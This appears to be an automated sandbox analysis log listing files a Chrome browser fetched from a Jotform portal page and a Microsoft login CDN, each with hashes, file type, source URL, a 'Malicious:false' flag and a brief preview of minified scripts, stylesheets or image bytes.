                                                                                                                                                                                                                                            Entropy (8bit):5.24652740231673
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:jSeMIoYOvYHOEfRKTwbvYf8TW1F6bv4vC1267wDYFPSU/SNHpp9eaaXwb/:DnZRn7YkTaFey6PFr+Hpp9ePXwb/
                                                                                                                                                                                                                                            MD5:B308A09E3BDEBF4FFF2CFF7B77CCDC7A
                                                                                                                                                                                                                                            SHA1:D0249AE74E1E7A75422C37830FBCB072C44D0684
                                                                                                                                                                                                                                            SHA-256:50A653379E5FAE866A0BB4AB00A387F74AC1B1B7CFBB9F9CBFA797419E134DF6
                                                                                                                                                                                                                                            SHA-512:50098CE42175351C3CD9F045C84C9DE6E8BBB363F46698D26E0B51B874F1EB4BB5A2EF880418C0C697E5E3C85E5336BEA4DD8EACF443DC016BDF9A1EE42BFA45
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://js.jotform.com/actions.js
                                                                                                                                                                                                                                            Preview:var JotFormActions=function(){"use strict";function o(n,r){return function(){for(var e=new Array(arguments.length),t=0;t<e.length;t++)e[t]=arguments[t];return n.apply(r,e)}}var t=Object.prototype.toString;function a(e){return"[object Array]"===t.call(e)}function n(e){return null!==e&&"object"==typeof e}function r(e){return"[object Function]"===t.call(e)}function i(e,t){if(null!=e)if("object"!=typeof e&&(e=[e]),a(e))for(var n=0,r=e.length;n<r;n++)t.call(null,e[n],n,e);else for(var o in e)Object.prototype.hasOwnProperty.call(e,o)&&t.call(null,e[o],o,e)}var d={isArray:a,isArrayBuffer:function(e){return"[object ArrayBuffer]"===t.call(e)},isBuffer:function(e){return null!=e&&null!=e.constructor&&"function"==typeof e.constructor.isBuffer&&e.constructor.isBuffer(e)},isFormData:function(e){return"undefined"!=typeof FormData&&e instanceof FormData},isArrayBufferView:function(e){return e="undefined"!=typeof ArrayBuffer&&ArrayBuffer.isView?ArrayBuffer.isView(e):e&&e.buffer&&e.buffer instanceof Ar
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (9110)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):152960
                                                                                                                                                                                                                                            Entropy (8bit):5.519074782413819
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:koBrWCi2gPZF8FmVSoKY7GzycgOii/GZ/b:h+xo9IVcgOii/sb
                                                                                                                                                                                                                                            MD5:6EC7D849DA15C0BF56C2C65D24B78E48
                                                                                                                                                                                                                                            SHA1:48042EA450B3F24C03E7BE5D02245AD2E5077BD2
                                                                                                                                                                                                                                            SHA-256:02B45CFF82C79D1188D7506BE2FB31F4B0635C233E7B25DFD872194FA75F2CC9
                                                                                                                                                                                                                                            SHA-512:7DD3E4142CAB74DD663397DEADC0B279F4C73178571E844ED776B493538FE7A7FD567F4DECE2683E52DD6A23FA166807FF820886D31E58D5EEC6BD5C003A8D7F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/PublicAppContainer.038a736a.js
                                                                                                                                                                                                                                            Preview:"use strict";.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="799946af-5d8f-5408-82a2-f5333ea675b7")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["3619"],{4523:function(e,t,o){o.r(t),o.d(t,{default:function(){return Lr}});var n=o("94653"),i=o("37897"),r=o("11268"),a=o.n(r),s=o("27219"),l=o("31028"),c=o("66187"),p=o("22722"),d=o("45050"),m=o("27505"),u=o("95474"),g=o("65957"),h=o("38111"),x=o("55767"),f=o("47085"),v=o("38675"),b=o("32358"),w=o("30886"),y=o("11759"),C=o("54513"),I=o("81885"),k=o("19195");const j=y.ZP.div`. display: flex;. flex-direction: column;. align-items: center;. width: 100%;.. ${(0,I.c)(C.DT.AppFooter)?y.iv`. height: 100%;. margin: 0 auto;. `:y.iv`. height: fit-content;. margin: 0 auto;. margin-bottom: calc(${({isOrder
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):780925
                                                                                                                                                                                                                                            Entropy (8bit):4.121014646987528
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:pzpzlXl+DD/DCD/DCD/DD/DCD/DCD/DD/DCD/DCD/DDCD/DD/DCD/DCD/DD/DCD8:VpHUM2A
                                                                                                                                                                                                                                            MD5:A6604ABAADCF1A25A434A312AE70E0ED
                                                                                                                                                                                                                                            SHA1:E78CCA5BE7631D49BA661E7F328F5D98D7E5E22D
                                                                                                                                                                                                                                            SHA-256:1202C7B0881D7C5ABF572B1008B0361CF485298DDA5734A77B7919ECD809D06B
                                                                                                                                                                                                                                            SHA-512:28223E7D1DDB51B39C534642DD471A3F008BB8EE4B124BA469605875D9A12CF5E0A403D627C8FAA492E64C8EADF42318733138602AD6650FF0AD9CFF26CC82F8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:!function(M,z){"use strict";"object"==typeof module&&module.exports?module.exports=z(require("moment")):"function"==typeof define&&define.amd?define(["moment"],z):z(M.moment)}(this,function(O){"use strict";void 0===O.version&&O.default&&(O=O.default);var z,W={},A={},c={},d={},R={},M=(O&&"string"==typeof O.version||C("Moment Timezone requires Moment.js. See https://momentjs.com/timezone/docs/#/use-it/browser/"),O.version.split(".")),b=+M[0],p=+M[1];function q(M){return 96<M?M-87:64<M?M-29:M-48}function o(M){var z=0,b=M.split("."),p=b[0],O=b[1]||"",A=1,c=0,b=1;for(45===M.charCodeAt(0)&&(b=-(z=1));z<p.length;z++)c=60*c+q(p.charCodeAt(z));for(z=0;z<O.length;z++)A/=60,c+=q(O.charCodeAt(z))*A;return c*b}function a(M){for(var z=0;z<M.length;z++)M[z]=o(M[z])}function L(M,z){for(var b=[],p=0;p<z.length;p++)b[p]=M[z[p]];return b}function n(M){for(var M=M.split("|"),z=M[2].split(" "),b=M[3].split(""),p=M[4].split(" "),O=(a(z),a(b),a(p),p),A=b.length,c=0;c<A;c++)O[c]=Math.round((O[c-1]||0)+6e4*O[c
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 977526
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):247237
                                                                                                                                                                                                                                            Entropy (8bit):7.998672569942294
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:6144:rLyDxN9RXGzPz8lxQWDj8xtjIEM4iBb6NQT7c:3yD7zGP8jTDjEpPcb6m3c
                                                                                                                                                                                                                                            MD5:934897EA9FAD777DE7A67F672C83BD1D
                                                                                                                                                                                                                                            SHA1:5C6B7A8097EB792627630415958D74EEF2F0C82E
                                                                                                                                                                                                                                            SHA-256:3CA4D4E7F1C7B15B1CB384F4F906E6C8E7E06C0FBA94C4D1BB9C432E5E3FB081
                                                                                                                                                                                                                                            SHA-512:392884619CCF9C71E0413CA5E5ECADF13C799DED7D2F2D58E7E4CF960C116562445FB501D5F57528895E95CD41E1D7A28173D8994CEBF2C6D19505543D0CB991
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:...........kw.. ....[7K.<.....[..q'.yu....=^..[L$R!);...~.'I9.>sf.....A.P(.U..........Y:.Y)7..$/.I....b&..*...iv$.......'/.>.U......l.,.1.........(D.....`.vd....Z.".W.!~R.Y.s.. .y|9.....<.....B..f_..s.^O.I..U..|..i..%./.9.?..^..e.....J....IQ..w.y.-.(..,.@....ju&..j..Vy.aOf3Y...%..r.............?.^..I!........P..F.....6.^Z.....FI4;.=....U....= ....'.>T..&._....:...8!....?.q.Z.Lb%....R...:.t>VZ.I.....|V.E..=Y..tQ.8qJ....D..|3tC...yQ..A.......$. Ag...Q..Q.)O.<>..p.w..f..v..i....m./.....8..u..*.@^..a>.Xh..A..9.d......A.c".nmM...89...... =8..+....nwN.Y.;.D._\. ...*.......W..x....+....Z......Mg...!.,...N.....vJJ._..J.....f*T%.*jy)....ID/@..C.q...M..c>.E.A.-.x...U...,i..>..B&@Wr&q.w..N...u....[2S...z.V.HN....<o+.#t4.'R..'..V..$.5...n..bg.D.....VL..2X.ZK%.E6v...`...n.,`...'..U.'.....V.,.....L.....R.i........7U.mq.Zd.|.PE..".|.E.4.g..\f..i@...8o-Y.r.gf......~.a.Te..Y.....v9-.@.1N.n7[.f0.$.)Ulw.ay..Z.+...<R...a..?..g.?....3..
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 144 x 144, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7994
                                                                                                                                                                                                                                            Entropy (8bit):7.928621762888753
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:MS8Hr7WcIIuQ+peRaAFZIkI7X7nC03l+9wWz6BWAK07A:L8HrUVpyFZIn7499z6/A
                                                                                                                                                                                                                                            MD5:ECE4CF0AC28CB7974F506C4E599E0C0E
                                                                                                                                                                                                                                            SHA1:B000F1E541DE360463B032F26F8D0801F971F156
                                                                                                                                                                                                                                            SHA-256:FE3CD2EB584A2DFBA09A16DA044CCB2F4B87AAF686FDA049D7E5588CF0F7BBF3
                                                                                                                                                                                                                                            SHA-512:8133EB51A0E38464BCBF35A574BD32173E2225AAC5AC6E778C0F053421B0A2B1AA2D75A71F6969D702B735E3F0D3C4D677BC574C98E2DA02F31AA77058DA9903
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:.PNG........IHDR..............F.....pHYs.................eXIfII*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100..............................................,IDATx..wt...?SNU.....Q$Q.......@....I..$7q.y...}...J.^..........n..A.P.. ....#.y..9....s...z.....93{v.......,......'D.{W@.......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$.......!.......*... ..F...... ..F.;k................UU.q...a.../.PI....b.z|..]s..F...$...r..>....r...I.S..2...x.7]V...*..),.pM..u..0.$.Y..eyD%5M...YA.ut].D].{/... I.Z$2..H.d.qt.b......~..G.t..Y...N......$...u.g...#V......x}*.2."#1R.....#.U..Y./..Z$2n.h.6a]..#...g=A.u\.'S....."11.._/...o>O$...A.YP@(..\c....dff".#E2,....!+.....,&PI...p8..&....b..x<^.g.$I......H0.d...dee...@__....Ajj*S.L......~s...n.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (19958)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):20329
                                                                                                                                                                                                                                            Entropy (8bit):5.3624721796340715
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:19/Z2q5fanCRe8SQ/4JA3XTXrk55QsIERe+GbxfQmFzr:1auj08SQ/4i3DXrk55dTRabxIQr
                                                                                                                                                                                                                                            MD5:078680BCFD27D1B1010694DF27382A65
                                                                                                                                                                                                                                            SHA1:4CB6E6F998D877C2C5AC6F3850B906367F8536B9
                                                                                                                                                                                                                                            SHA-256:DA9F5A97CCA8958DDBF992FD4D50AA323708A2CD011DE89944D718FD0CD3D786
                                                                                                                                                                                                                                            SHA-512:366A74038BDBEC8F050BDF392D2C020325E66F6C2AABDB3E8584F099107768D9AD7B6115A656D98A785BBF0E8DC8F723824BA8145AC78804711392CA30D9F10C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/2224.7e35d425.js
                                                                                                                                                                                                                                            Preview:"use strict";.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="6d3191b4-0e30-546c-8b1e-a3878d876cd2")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["2224"],{47456:function(n,e,t){t.d(e,{Z:function(){return h}});var i=t("94653"),a=t("37897"),r=t("11268"),u=t("41663"),c=t("12857"),o=t("98651");const l=({assetType:n,assetProps:e,campaignInfo:t,Fallback:r})=>{const l=Object.keys(t).includes("type")?[t]:[t.promotion,t.campaign,t.announcement,t.launch].filter((n=>!!n)),[y,d]=l.map((e=>{const{status:t=!0,type:i,assetsVersion:a,assetsAvailable:r=!0,assetYear:u="2024"}=e,o=(0,c.YZ)({assetInfo:{campaignType:i,assetsVersion:a,assetYear:u},assetType:n}),l=(0,c.ai)({assetType:n,assetsVersion:a,campaignType:i});return o&&r&&t&&!l?[o,e]:[]})).filter((n=>!!n.length))[
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):96
                                                                                                                                                                                                                                            Entropy (8bit):5.218997042938778
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:iuh72iczBra82yFsJFouMo+q6mgqWd6Nk:NciczBdTFsJFoM+q62Nk
                                                                                                                                                                                                                                            MD5:9872BE83FA60DA999B65A3BD481731D3
                                                                                                                                                                                                                                            SHA1:B59A8688C6A0D5311C6410A0D91537084E148F2D
                                                                                                                                                                                                                                            SHA-256:5DEE42A8D755847C0813D4E5F033F51197B20DD3C6C2EE4FBE31FD27B2F593D3
                                                                                                                                                                                                                                            SHA-512:53E947C87386ECF19E3B36E3F292A9757911F0F8B02FE36DDFC0DD74A3C784D97B15066AB4895EA694F66792A8C7CF525F59A03868FF5D5F0C3B5203D34C5F7D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                                                                                                                                                                                            Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O348JyJcXRABGP////8P
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):85033
                                                                                                                                                                                                                                            Entropy (8bit):5.542917062819583
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:OQdNoq/jPxNk6BQ57Hks03Ov2qg6oVwQtS7JmJ8JeR5OyNXlonD:OiNoq/bFH3OvuXcD
                                                                                                                                                                                                                                            MD5:3A81F9F59313ABFB144DF402AB0EF0F2
                                                                                                                                                                                                                                            SHA1:78E2A2202C1A5CA18515235A23BF464BD1E6B196
                                                                                                                                                                                                                                            SHA-256:2DBFDAFAB882F8D39E039BDEBBB98A8EBA3A2B79D1661D3109498F4B3C9579D0
                                                                                                                                                                                                                                            SHA-512:9DDC2F6F7AE3DA8E12C5921417087EEDAD7CE3C6695CC6FBE605043018451F863AD07A841BBE37F3FFCF8586A12DA8E962A652A430BA9BCECE44CE7E2D139978
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn03.jotfor.ms/s/portal/674ac14411e/static/css/6354.b5c7ba01.chunk.css
                                                                                                                                                                                                                                            Preview:.formAccountBox-wrapper{text-align:left;position:absolute;top:12px;right:12px}.jfCardForm.isMobile .formAccountBox-wrapper{top:8px;right:8px}.avatarBox{cursor:pointer;background-color:#f98d02;background-position:50%;background-repeat:no-repeat;background-size:cover;border:1px solid #fff;border-radius:50%;width:40px;height:40px;box-shadow:0 0 4px rgba(0,0,0,.19)}.formAccountBox-tooltip{z-index:5;background-color:#fff;border-radius:6px;width:92vw;max-width:320px;margin-top:12px;padding:3px 0;font-family:-apple-system,system-ui,BlinkMacSystemFont,Segoe UI,Roboto,Noto Sans,Ubuntu,Cantarell,Helvetica Neue,roboto,oxygen-sans,ubuntu,cantarell,sans-serif;font-size:14px;font-weight:500;line-height:1.5;display:block;position:absolute;top:100%;right:0;box-shadow:0 0 6px rgba(0,0,0,.5)}.formAccountBox-tooltip.isClosed{display:none}.formAccountBox-tooltip:before{content:"";background:#fff;width:12px;height:12px;display:inline-block;position:absolute;top:-6px;right:15px;transform:rotate(45deg);box-s
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 144 x 144, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):7994
                                                                                                                                                                                                                                            Entropy (8bit):7.928621762888753
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:MS8Hr7WcIIuQ+peRaAFZIkI7X7nC03l+9wWz6BWAK07A:L8HrUVpyFZIn7499z6/A
                                                                                                                                                                                                                                            MD5:ECE4CF0AC28CB7974F506C4E599E0C0E
                                                                                                                                                                                                                                            SHA1:B000F1E541DE360463B032F26F8D0801F971F156
                                                                                                                                                                                                                                            SHA-256:FE3CD2EB584A2DFBA09A16DA044CCB2F4B87AAF686FDA049D7E5588CF0F7BBF3
                                                                                                                                                                                                                                            SHA-512:8133EB51A0E38464BCBF35A574BD32173E2225AAC5AC6E778C0F053421B0A2B1AA2D75A71F6969D702B735E3F0D3C4D677BC574C98E2DA02F31AA77058DA9903
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://eu-files.jotform.com/jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=BVGW99P1wnPlh67eKiG1PA&expires=1736510728&width=144&height=144
                                                                                                                                                                                                                                            Preview:.PNG........IHDR..............F.....pHYs.................eXIfII*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100..............................................,IDATx..wt...?SNU.....Q$Q.......@....I..$7q.y...}...J.^..........n..A.P.. ....#.y..9....s...z.....93{v.......,......'D.{W@.......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$......B@.[...l!.$.......!.......*... ..F...... ..F.;k................UU.q...a.../.PI....b.z|..]s..F...$...r..>....r...I.S..2...x.7]V...*..),.pM..u..0.$.Y..eyD%5M...YA.ut].D].{/... I.Z$2..H.d.qt.b......~..G.t..Y...N......$...u.g...#V......x}*.2."#1R.....#.U..Y./..Z$2n.h.6a]..#...g=A.u\.'S....."11.._/...o>O$...A.YP@(..\c....dff".#E2,....!+.....,&PI...p8..&....b..x<^.g.$I......H0.d...dee...@__....Ajj*S.L......~s...n.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):127730
                                                                                                                                                                                                                                            Entropy (8bit):5.179677443115106
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:QYgbKMjXZeCRxITGzHVncHRlGZjgiBVsTvh+xNlY1rr3VcF83FaXD3S:rlMjXICsTGzHVRZjnBVsFryxD3S
                                                                                                                                                                                                                                            MD5:17AFD03A811487DB52E8C2C176845073
                                                                                                                                                                                                                                            SHA1:A86B10CD9A9839AC2BE073A6CE6EEDA27462A929
                                                                                                                                                                                                                                            SHA-256:F4FEFFEBE5AAF8C0FC1BBEE0F4751307943A10D312F7FAC131A5A8D5536B54ED
                                                                                                                                                                                                                                            SHA-512:5E53A1C9FF54713D3F9DABE4D4F3E8759745CF9C69BA15097DB1192E22FB1AC8D6FB1F859F9BC081A18C401D8E0C7F9242B1BB6C984C28CF743EF3D9D62C3EBE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn03.jotfor.ms/s/portal/674ac14411e/static/css/jotform.css.e448a675.css
                                                                                                                                                                                                                                            Preview:@import "https://cdn.jotfor.ms/fonts/?family=Circular";@property --bg-opacity{syntax:"<number>";inherits:false;initial-value:1}@property --color-opacity{syntax:"<number>";inherits:false;initial-value:1}@property --border-opacity{syntax:"<number>";inherits:false;initial-value:1}@property --border-t-opacity{syntax:"<number>";inherits:false;initial-value:1}@property --border-r-opacity{syntax:"<number>";inherits:false;initial-value:1}@property --border-b-opacity{syntax:"<number>";inherits:false;initial-value:1}@property --border-l-opacity{syntax:"<number>";inherits:false;initial-value:1}@property --border-x-opacity{syntax:"<number>";inherits:false;initial-value:1}@property --border-y-opacity{syntax:"<number>";inherits:false;initial-value:1}@property --outline-opacity{syntax:"<number>";inherits:false;initial-value:1}@property --divide-opacity{syntax:"<number>";inherits:false;initial-value:1}@property --fill-opacity{syntax:"<number>";inherits:false;initial-value:1}@property --stroke-opacity{
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):17174
                                                                                                                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://logincdn.msauth.net/16.000.30435.8/images/favicon.ico
                                                                                                                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):188877
                                                                                                                                                                                                                                            Entropy (8bit):5.87011986087482
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:ak7V3HibH4BO0x7NKoAwWEttFjZBkOAOQ01mreYzdVy48xK34KbeeCo7MAcBNq:ak/OyKCt11hwdVy48o34KNBQNq
                                                                                                                                                                                                                                            MD5:DC7D4D348FE1F99AF4AC06D2A42B5088
                                                                                                                                                                                                                                            SHA1:65BB9F01723084A15404421BA1DB1895B968A0ED
                                                                                                                                                                                                                                            SHA-256:15B7CBC354E3B92301ACB88F9E8A95586A0B5A4444F1EDDAB0C8287A2B638CF7
                                                                                                                                                                                                                                            SHA-512:0B439413F57D1131C449B5BE533981B7FF252A4812B3A33B0787C1FE4C27C0A44C395ACC135985841C9980CB9AEFB6A27CDC677B6C04FF4864E06B4AE5CC8108
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/4646.d3fc3085.js
                                                                                                                                                                                                                                            Preview:/*! For license information please see 4646.d3fc3085.js.LICENSE.txt */..!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="66243b25-ed31-5941-958c-2e958167edbd")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["4646"],{87868:function(e){!function(t){"use strict";function r(e,t){var r=(65535&e)+(65535&t);return(e>>16)+(t>>16)+(r>>16)<<16|65535&r}function n(e,t,n,i,s,o){return r((a=r(r(t,e),r(i,o)))<<(c=s)|a>>>32-c,n);var a,c}function i(e,t,r,i,s,o,a){return n(t&r|~t&i,e,t,s,o,a)}function s(e,t,r,i,s,o,a){return n(t&i|r&~i,e,t,s,o,a)}function o(e,t,r,i,s,o,a){return n(t^r^i,e,t,s,o,a)}function a(e,t,r,i,s,o,a){return n(r^(t|~i),e,t,s,o,a)}function c(e,t){var n,c,l,u,h;e[t>>5]|=128<<t%32,e[14+(t+64>>>9<<4)]=t;var p=1732584193,d=-271733879,f=-1732584194,m=2717
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (18756)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):827005
                                                                                                                                                                                                                                            Entropy (8bit):5.520770310256857
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:/ufW1nfgSPgHBjLyftsUbIZ6vq6neX7z3lpD7h:/8W1nfgSPgHBjLyftsUbu3lpnh
                                                                                                                                                                                                                                            MD5:C18BAA1158C442EE57107E746D05174A
                                                                                                                                                                                                                                            SHA1:BAD70363380E511529486CF37A8D11EF376DB52A
                                                                                                                                                                                                                                            SHA-256:C78EB10D8CFCD0E1DE8E39189E9839D00B75B532DE13A8C2411AD5D1E16AE1B1
                                                                                                                                                                                                                                            SHA-512:A95EDA56F27442A15A52E21ADD66092D10C81B6ACDFED6C0E9A953C185C21342E6D8144A881562D88D2E11FFCEED4C0A91DB27BEAEB7D967C1ADC79CFC7CDEF8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:"use strict";.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="51061f91-b0a3-5bd3-ae21-3d4ac5baed21")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["6158"],{21906:function(e,t,a){var o,i=a(37897);function n(){return n=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var a=arguments[t];for(var o in a)({}).hasOwnProperty.call(a,o)&&(e[o]=a[o])}return e},n.apply(null,arguments)}t.Z=e=>i.createElement("svg",n({xmlns:"http://www.w3.org/2000/svg",fill:"none",style:{maxWidth:"100%",height:"auto"},viewBox:"0 0 498 105"},e),i.createElement("rect",{width:105,height:105,rx:8,style:{fill:"url(#cardItemPlaceholder_svg__a)"}}),i.createElement("g",{clipPath:"url(#cardItemPlaceholder_svg__b)"},i.createElement("rect",{width:373,height:
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 977526
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):247237
